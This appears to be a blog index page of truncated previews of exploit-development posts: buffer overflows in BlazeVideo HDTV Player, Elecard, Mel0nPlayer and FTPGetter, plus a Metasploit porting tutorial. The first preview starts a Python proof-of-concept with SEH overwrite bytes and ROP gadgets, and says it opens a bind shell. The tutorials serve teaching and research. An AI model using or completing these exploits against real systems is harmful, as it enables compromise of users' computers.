BlazeVideo HDTV Player 6.x Buffer Overflow (another version)
Hi again, we tried to make a universal DEP and ASLR bypass version for BlazeVideo HDTV Player 6.x. This exploit is already public, but we just wanted to make it universal. Take a look at mona.py, an awesome tool developed by corelanc0d3r and his team. So here is the PoC; it will bind to port 31337:

#!/usr/bin/python
import struct
file = 'blazevideo-universal.plf'
totalsize = 5000
junk = 'A' * 872
align = 'B' * 136 #we don't need nseh
seh = '\x4a\x53\x30\x61' # ADD ESP,800 # RETN
rop = '\x03\x60\x32\x61' * 10 # RETN (ROP NOP)
rop+= '\x7a\x34\x05\x64' # POP EDX # RETN
rop+=...
Porting Your Exploit to Metasploit
Some time ago I posted a tutorial on basic exploit development (the direct return technique) and on SEH-based exploit development. Now let's port that exploit to the Metasploit Framework so that it becomes more reliable and can use the wide range of payloads and advanced features that Metasploit provides. We will convert the first exploit, the one for Free CD to MP3 Converter. Before that, let's gather the key points that make the exploit work, as follows: junk = "\x41" * 4112 # the amount of junk that...
SEH Based Stack Overflow – The Basic
This time I will try another stack overflow technique: the SEH-based stack overflow. What is SEH? Please read the following references: Structured Exception Handling; Win32 Exception handling for assembler programmers. There is nothing more enjoyable than learning by doing. We will try an SEH-based stack overflow on a program that sickness once posted about, Elecard AVC_HD/MPEG Player. Elecard AVC_HD/MPEG Player version 5.7 suffers from a buffer overflow when it tries to load an .m3u file to which a large number of characters has been appended. This experiment will be carried out on...
Mel0nPlayer 1.0.11.x Denial of Service POC
Software Description: Mel0n Player is a popular application in Indonesia for playing songs provided by the Melon portal (http://www.melon.co.id). It can play common music file types such as mp3, wav, wma, mp4, and others, either from files on the local computer or by streaming online from the Melon portal. Songs can also be downloaded to the local computer. Vulnerability Information: The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability when opening the p_about.ini file (Note: p_about.ini is actually a configuration file that is part of a skin...
FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit
A vulnerability has been discovered in FTPGetter which can be exploited by malicious people to compromise a user's system. The issue is likely due to insufficient bounds checking and presents itself when the affected FTP client connects to a malicious server that answers in PASV mode. The PASV command is issued to tell the server that the client wishes to transfer files in passive mode; FTP servers that support passive mode respond to such a request with an IP address and port number. Successful exploitation allows execution of arbitrary code, but requires that the user...